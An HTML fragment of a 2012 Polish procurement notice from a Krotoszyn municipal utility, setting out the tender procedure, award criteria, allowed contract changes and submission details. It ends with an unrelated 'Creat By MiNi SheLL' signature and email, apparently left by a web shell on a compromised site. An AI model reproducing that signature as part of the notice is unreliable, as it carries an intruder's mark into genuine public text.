<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Warunki gwarancji - 10</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza istotne zmiany postanowień umowy w przypadku wystąpienia okoliczności, których nie można było przewidzieć w chwili zawarcia umowy m. in. w przypadku:
-  zmiany stawki podatku od towarów i usług (VAT) prowadzącej do zmiany ceny,
- konieczności wprowadzenia zmian projektowych lub technologicznych, które prowadzą do przedłużenia terminu zakończenia robót,
- zajdzie potrzeba dostosowania terminu wykonania do robót prowadzonych przy budowie kanalizacji sanitarnej i deszczowej przez inwestora zewnętrznego,
- zmian dokumentacji projektowej dokonanych na wniosek Zamawiającego lub Wykonawcy, które prowadzą do przedłużenia terminu zakończenia robót,
- zmian uzgodnień z właścicielami ulic, które powodują wydłużenie terminu zakończenia robót,
- niemożliwych do przewidzenia niekorzystnych warunków atmosferycznych, które mają wpływ na realizację zamówienia i powodują wydłużenie terminu zakończenia robót,
- wystąpienia nieprzewidzianych robót, mających wpływ na prawidłowe wykonanie przedmiotu umowy, których realizacja powoduje konieczność przedłużenia terminu umowy podstawowej. Zamawiający dopuszcza możliwość przedłużenia tego terminu o okres niezbędny do realizacji ww robót,
- wystąpienia ewentualnych prac zamiennych lub nie wykonanych. Zamawiający dokona zmiany wartości umowy wg wskaźników podstawowego kosztorysu umownego,
- gdy zmiany będą korzystne dla zamawiającego i będą leżały w interesie publicznym,
- zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pgkim.krotoszyn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Przedsiębiorstwo Gospodarki Komunalnej i Mieszkaniowej Spółka z o.o. 63-700 Krotoszyn ul. Rawicka 41 pokój nr 13 (Dz. Adm-Techn.).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.05.2012 godzina 10:00, miejsce: Przedsiębiorstwo Gospodarki Komunalnej i Mieszkaniowej Spółka z o.o. 63-700 Krotoszyn ul. Rawicka 41 pokój nr 13 (Dz. Adm-Techn.).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com